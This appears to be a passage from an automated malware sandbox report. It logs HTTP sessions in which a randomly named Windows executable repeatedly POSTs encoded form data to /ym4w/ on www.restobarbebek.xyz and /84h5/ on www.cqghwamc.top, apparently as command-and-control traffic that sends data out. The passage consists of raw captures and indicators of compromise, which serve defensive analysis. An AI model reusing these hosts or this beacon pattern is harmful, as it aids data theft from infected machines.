                                                                                      Data Ascii: 9jtPKX=GQe9QT6M7+NtgC12EnqlMILk4o+Ce1ozpAC4evAK7igEHt32d0BOHLv63S6sKokTvyN5Y5zJA8Lt1sn4OUNLgEa/ei33ttgEnbpMLsED06k2JzHyIuMc0TwJ4f3fcug50+RFLJqjmR1m9lfyAJUsYjBDQES/y78E+rpiYHu81m6NMku/0TLB3wTrFCMD0PZ1hYVfGb7GOb89


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.65880585.159.66.93802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:08.488476992 CEST802OUTPOST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 47 51 65 39 51 54 36 4d 37 2b 4e 74 69 69 6c 32 58 57 71 6c 62 34 4c 6e 30 49 2b 43 55 56 6f 76 70 41 4f 34 65 71 35 50 37 51 45 45 48 4a 7a 32 65 78 31 4f 45 4c 76 36 76 69 36 6a 45 49 6b 4d 76 79 41 4d 59 37 58 4a 41 38 66 74 31 73 58 34 4f 48 6c 49 76 30 61 68 53 43 33 78 7a 64 67 45 6e 62 70 4d 4c 73 52 57 30 36 38 32 4a 41 66 79 48 76 4d 66 33 54 77 4f 79 2f 33 66 59 75 67 31 30 2b 52 72 4c 4e 4c 72 6d 54 4e 6d 39 67 6a 79 44 61 4d 74 57 6a 42 4a 65 6b 54 63 7a 35 51 49 32 36 67 42 51 55 4b 59 6d 68 69 63 41 79 76 6c 6f 67 4c 69 6c 67 7a 70 46 41 55 78 30 76 5a 66 6a 59 74 66 55 4d 33 68 42 76 5a 65 51 45 4e 30 46 4e 35 55 45 42 4c 78 2b 4b 42 64 49 75 34 66 6f 77 3d 3d
                                                                                      Data Ascii: 9jtPKX=GQe9QT6M7+Ntiil2XWqlb4Ln0I+CUVovpAO4eq5P7QEEHJz2ex1OELv6vi6jEIkMvyAMY7XJA8ft1sX4OHlIv0ahSC3xzdgEnbpMLsRW0682JAfyHvMf3TwOy/3fYug10+RrLNLrmTNm9gjyDaMtWjBJekTcz5QI26gBQUKYmhicAyvlogLilgzpFAUx0vZfjYtfUM3hBvZeQEN0FN5UEBLx+KBdIu4fow==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.65880785.159.66.93802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:11.036335945 CEST1815OUTPOST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 47 51 65 39 51 54 36 4d 37 2b 4e 74 69 69 6c 32 58 57 71 6c 62 34 4c 6e 30 49 2b 43 55 56 6f 76 70 41 4f 34 65 71 35 50 37 51 4d 45 48 61 37 32 65 53 64 4f 46 4c 76 36 6d 43 36 67 45 49 6b 42 76 78 77 49 59 37 72 2f 41 2f 6e 74 36 76 66 34 61 6d 6c 49 30 45 61 68 4e 79 33 30 74 74 68 4d 6e 59 52 49 4c 73 42 57 30 36 38 32 4a 46 54 79 4f 65 4d 66 78 54 77 4a 34 66 33 70 63 75 68 71 30 2b 4a 64 4c 4d 4b 4a 6d 6a 74 6d 36 41 54 79 54 35 6f 74 65 6a 42 48 64 6b 54 36 7a 35 64 57 32 36 73 6e 51 56 75 69 6d 6d 53 63 46 6b 4f 47 37 6a 37 4e 37 52 6a 59 56 77 70 56 33 35 4a 75 72 37 70 61 5a 38 76 48 48 75 56 50 4a 54 74 76 4d 66 45 69 43 44 37 63 32 71 67 55 4a 61 52 34 30 5a 44 41 71 54 49 70 39 62 63 4b 53 2b 47 38 79 7a 44 53 47 32 30 34 63 43 36 47 43 6b 36 43 52 39 49 31 42 50 66 32 7a 42 68 46 35 53 49 79 64 52 57 63 31 36 72 55 69 77 4b 2b 6c 4e 4f 45 39 4a 6a 58 6e 6c 35 49 7a 47 62 73 6e 6f 7a 74 47 4a 70 35 46 4e 79 79 46 6d 36 4d 44 2f 4d 39 45 4a 52 6d 37 47 72 30 51 77 4d [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=GQe9QT6M7+Ntiil2XWqlb4Ln0I+CUVovpAO4eq5P7QMEHa72eSdOFLv6mC6gEIkBvxwIY7r/A/nt6vf4amlI0EahNy30tthMnYRILsBW0682JFTyOeMfxTwJ4f3pcuhq0+JdLMKJmjtm6ATyT5otejBHdkT6z5dW26snQVuimmScFkOG7j7N7RjYVwpV35Jur7paZ8vHHuVPJTtvMfEiCD7c2qgUJaR40ZDAqTIp9bcKS+G8yzDSG204cC6GCk6CR9I1BPf2zBhF5SIydRWc16rUiwK+lNOE9JjXnl5IzGbsnoztGJp5FNyyFm6MD/M9EJRm7Gr0QwMuPdY7ajEpa7FpomP81MEdp+vUOlPJZQ9c6E9q6xqyfmKWuuVYHt26atEjZyhfJ2CUYdBCMF7Fg2dZ7OxSDORffq+VHX16EZyLWod6VHydVHkuBe7NpiCniDZ0XUgLHcIt1AQU85rq3JM4/3FMPfWRNvygGtAirN88L+tI9WM5lLV+Q46nxYYy7H1I7QshPlBP5zdxDnTB5Pa7YeQ48Ezv7AS1t3fdzGxCO+C6/F0GM8KqfMSzAAm1hKcnifIrcFdAQ2ULrPOMUoearEIAOuQX26kv4MvCry4FUWZ+YRMZzhsdiZyqVhmbhbtb2dJbpSgQ0D/XIOpccsAJAaUiIhLbL3WyeDBefZjVWRaNkO8gmFpZPSeqeZcpaHAdy8w5huzhJtpDYclR8ZdoPXV5AaID3uA5/3zGDeywk2SNWfnibx0iPqWsm+uq3t74YwOn0nQVN5Gws4/+XDoTKocCL2ofBFn1EQNmIYDWTnTfzPtP7IN3DvD1tgRWaL+ics8lz3mROMASp/SCvOrNBnZ1iYq7zmXZJiU7qQeUeEwPi72f6jVF7Hn61wgP32R1lIG3XKvsie8IkNOL63YHCWXJtZEHJQUZn7hwn0ZLGA51laHlch+CW2dY+0+Vq0WoMDaLMg61UZZBWYWlZJHSXtgxJAGRhX2/3NsnVjGWD [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.65880885.159.66.93802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:13.657603979 CEST509OUTGET /ym4w/?YDT4P=4xd8DzO&9jtPKX=LS2dTmeF3OBn8G1tQUmCXYTIgtzicGlzjT2aVYBBrxZqGpjDVT9zDZ74on3XL6wvhAoqbJrICZyPh8boIihM0FmnY1HfyNJnnrRiM85d/p0/MDPjGflqx28U0PmHY+963/VActc= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:14.326519012 CEST225INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Mon, 30 Sep 2024 08:44:14 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      X-Rate-Limit-Limit: 5s
                                                                                      X-Rate-Limit-Remaining: 19
                                                                                      X-Rate-Limit-Reset: 2024-09-30T08:44:19.2137950Z


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.658809221.128.225.57802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:20.568173885 CEST763OUTPOST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 72 2f 63 4b 63 77 35 49 55 74 2f 41 61 31 6a 51 46 35 6e 78 63 6a 4d 59 66 68 53 38 51 72 56 37 50 36 77 62 36 7a 36 62 4f 37 39 6d 4c 75 64 54 36 6c 36 36 6f 41 74 6d 32 72 78 44 74 49 44 31 35 64 65 62 35 69 53 33 4d 6a 6b 32 2f 53 7a 51 50 32 74 45 57 33 34 53 38 44 2b 34 6c 53 4d 46 4f 74 69 36 4e 5a 69 65 69 4b 75 74 38 69 46 4a 52 6c 5a 47 64 57 6b 4f 31 74 52 54 39 46 4e 67 51 56 65 7a 58 42 4f 37 66 47 62 42 78 41 30 41 63 41 59 5a 47 34 56 6b 71 6a 6c 35 4a 4d 35 77 63 52 46 6a 46 71 4a 48 70 4f 6f 37 51 50 65 74 4c 36 73 66 44 4e 63 59 41 4a 55 39 34 30 34 75 61 55 39 49 6f 39 58 78 45 56 38 6e
                                                                                      Data Ascii: 9jtPKX=r/cKcw5IUt/Aa1jQF5nxcjMYfhS8QrV7P6wb6z6bO79mLudT6l66oAtm2rxDtID15deb5iS3Mjk2/SzQP2tEW34S8D+4lSMFOti6NZieiKut8iFJRlZGdWkO1tRT9FNgQVezXBO7fGbBxA0AcAYZG4Vkqjl5JM5wcRFjFqJHpOo7QPetL6sfDNcYAJU9404uaU9Io9XxEV8n
                                                                                      Sep 30, 2024 10:44:21.420587063 CEST1236INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92b251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:20 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                      Sep 30, 2024 10:44:21.420605898 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.658810221.128.225.57802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:23.112644911 CEST787OUTPOST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 72 2f 63 4b 63 77 35 49 55 74 2f 41 62 56 54 51 48 66 76 78 4a 7a 4d 58 47 68 53 38 48 37 55 38 50 36 4d 62 36 79 50 47 62 64 6c 6d 4c 50 74 54 37 68 4f 36 6b 67 74 6d 39 4c 78 38 70 49 44 75 35 64 43 6c 35 6e 71 33 4d 6a 67 32 2f 54 44 51 50 48 74 48 57 6e 34 71 32 54 2b 32 68 53 4d 46 4f 74 69 36 4e 5a 6e 31 69 4c 47 74 2f 54 31 4a 58 45 5a 48 55 32 6b 42 32 74 52 54 71 31 4e 6b 51 56 66 63 58 44 37 7a 66 46 6a 42 78 43 63 41 63 55 30 65 54 6f 56 69 31 7a 6b 46 41 70 51 65 59 52 45 51 62 4a 34 6b 70 4e 6f 52 63 5a 66 33 58 4a 73 38 52 64 38 61 41 4c 4d 50 34 55 34 45 59 55 46 49 36 71 62 57 4c 68 5a 45 6b 4c 30 4f 72 39 79 32 63 78 6c 79 37 42 41 4b 67 69 52 55 4a 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=r/cKcw5IUt/AbVTQHfvxJzMXGhS8H7U8P6Mb6yPGbdlmLPtT7hO6kgtm9Lx8pIDu5dCl5nq3Mjg2/TDQPHtHWn4q2T+2hSMFOti6NZn1iLGt/T1JXEZHU2kB2tRTq1NkQVfcXD7zfFjBxCcAcU0eToVi1zkFApQeYREQbJ4kpNoRcZf3XJs8Rd8aALMP4U4EYUFI6qbWLhZEkL0Or9y2cxly7BAKgiRUJQ==
                                                                                      Sep 30, 2024 10:44:23.977242947 CEST1236INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92a251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:22 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                      Sep 30, 2024 10:44:23.977257967 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.658811221.128.225.57802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:25.658911943 CEST1800OUTPOST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 72 2f 63 4b 63 77 35 49 55 74 2f 41 62 56 54 51 48 66 76 78 4a 7a 4d 58 47 68 53 38 48 37 55 38 50 36 4d 62 36 79 50 47 62 64 74 6d 4c 63 31 54 36 47 53 36 6c 67 74 6d 79 62 78 39 70 49 44 76 35 64 61 68 35 6d 57 4e 4d 68 49 32 74 68 62 51 65 46 46 48 50 58 34 71 2b 7a 2b 37 6c 53 4d 71 4f 70 47 2b 4e 5a 33 31 69 4c 47 74 2f 51 74 4a 58 56 5a 48 59 57 6b 4f 31 74 52 58 39 46 4e 4d 51 56 33 6d 58 44 76 6a 66 31 44 42 78 69 73 41 61 68 59 65 4f 59 56 67 30 7a 6b 64 41 70 55 64 59 52 5a 6a 62 4a 39 7a 70 50 30 52 63 65 2b 54 4b 35 59 46 51 63 4a 39 57 4b 77 4d 7a 44 41 70 57 53 59 77 31 72 69 67 4e 56 4a 37 73 2f 73 59 2f 39 50 4a 62 52 5a 77 7a 57 4e 6e 69 77 63 77 52 47 55 70 4b 6f 72 78 33 64 65 59 50 41 38 73 32 37 66 6e 46 58 33 53 36 65 6d 30 68 5a 63 4c 44 42 52 30 64 31 44 74 55 6a 67 71 47 50 55 39 77 63 63 62 55 33 71 51 38 62 5a 63 4f 57 76 51 32 6b 46 49 77 4d 76 56 6b 62 55 74 31 64 47 35 4b 35 53 79 66 35 34 2b 2b 47 52 38 58 6b 58 76 48 42 56 43 69 49 6b 62 4b 79 52 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=r/cKcw5IUt/AbVTQHfvxJzMXGhS8H7U8P6Mb6yPGbdtmLc1T6GS6lgtmybx9pIDv5dah5mWNMhI2thbQeFFHPX4q+z+7lSMqOpG+NZ31iLGt/QtJXVZHYWkO1tRX9FNMQV3mXDvjf1DBxisAahYeOYVg0zkdApUdYRZjbJ9zpP0Rce+TK5YFQcJ9WKwMzDApWSYw1rigNVJ7s/sY/9PJbRZwzWNniwcwRGUpKorx3deYPA8s27fnFX3S6em0hZcLDBR0d1DtUjgqGPU9wccbU3qQ8bZcOWvQ2kFIwMvVkbUt1dG5K5Syf54++GR8XkXvHBVCiIkbKyRn417oVwbxwdHAh90Q6d2UX/qyNZvnC4EyOMHV/2NoBKFd2V8tGSxPhALCrLCSyKprCBY2PuHbXNBWdqjmTmQjCCxSw6tjYnAJpQH2QAKt+mWyGgOYlTUTvVoA9HDXWt8CGBKl5QA63a2Jf05VanrslozVDHrFcgkO/EgJFgdTEBXXusuz7k9TC90xOeKHcwFYfq1sxDr6AZ0RB2rgnNqfu9DU3Uk0NM8KdIs5pQ5/nHuXWCvCvFLKuX9WbuUN5emI/EM0T8cKV5VCP0/eQ3VRAYM6SUVzw7/VHtexO3IUNZvCEwueBEtDCmYIRSy2oAjUD5HMAjVb6J0VF3IgoAmqWwwtQ5Vf4WUXP7ADum4E+BoiNqssTQ0RVbAG0+U7Awnsnd/24IXAV9Jlw/KYQWCYbA0zljalOukoyf5hhQboX1ypWsdl2dNL0CIGXO6ceUnBJMzAJ1n7I3mEr/V/0xZLY/Gdr25kRcRpYtrgAt0PAeq7WKjZSxMRaEj+acGI60VaMD32zDCBxgjv3KUrjFaW232DSw7uGN6CDzQKBNJY9W1R4eYLsX1jVlnR579xEM7o0GlELfDGrHuyEEptrcwFp0senMgibBGZV9vUtloJ6pA6fceptSRcy2+T+5SdoMFgr2EwR0QB2BKM4kusv2sNWd+yAWbQ/qUa2 [TRUNCATED]
                                                                                      Sep 30, 2024 10:44:26.510411024 CEST1236INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92c251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:24 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
